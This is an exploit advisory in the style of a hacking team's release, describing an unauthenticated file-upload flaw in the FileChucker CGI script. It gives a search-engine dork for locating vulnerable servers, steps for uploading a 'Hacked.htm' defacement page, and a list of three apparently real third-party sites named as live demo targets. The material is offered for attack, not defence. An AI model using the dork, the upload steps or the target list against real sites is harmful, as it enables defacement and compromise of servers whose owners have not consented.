####################################################### # # [+] Exploit Title: FileChucker File Upload Vulnerability # [+] Google Dork: inurl:/cgi-bin/filechucker.cgi OR "intext:File Upload by Encodable" OR inurl:/cgi-bin/filechucker.pl # [+] Date: 28-06-2013 # [+] Exploit Author: Iranian_Dark_Coders_Team # [+] Home : www.idc-team.net # [+] Category: webapps # [+] Software Link: http://encodable.com/filechucker/trial/filechucker.zip # [+] Vendor Homepage: http://encodable.com/filechucker/ # [+] Tested on: Windows 7 # ####################################################### # # [+] Exploit: # # [+] http://localhost/[path]/cgi-bin/filechucker.cgi # [+] http://localhost/[path]/cgi-bin/filechucker.pl # # ####################################################### # # [+] Proof: # # [+] http://localhost/[path]/cgi-bin/filechucker.cgi # [1] You must enter the requested information first. # [2] Please Click on the Browse and Select a file ( .htm , .html , .gif , .jpg , .png , .txt ) # [3] http://localhost/[path]/upload/files/Hacked.htm OR Hacked.html # ####################################################### # # [+] Demo site: # # [+] http://www.artcoloXrcv.com.br/cgi-bin/filechucker.cgi # [+] http://toptowXn.co.uk/cgi-bin/filechucker.cgi # [+] http://www.npXnweb.org/cgi-bin/filechucker.cgi # ####################################################### # # [+] Discovered By : Black.Hack3r # [+] We Are : M.R.S.CO,Black.Hack3r,N3O,UB313 # [+] Home : http://www.idc-team.net # #######################################################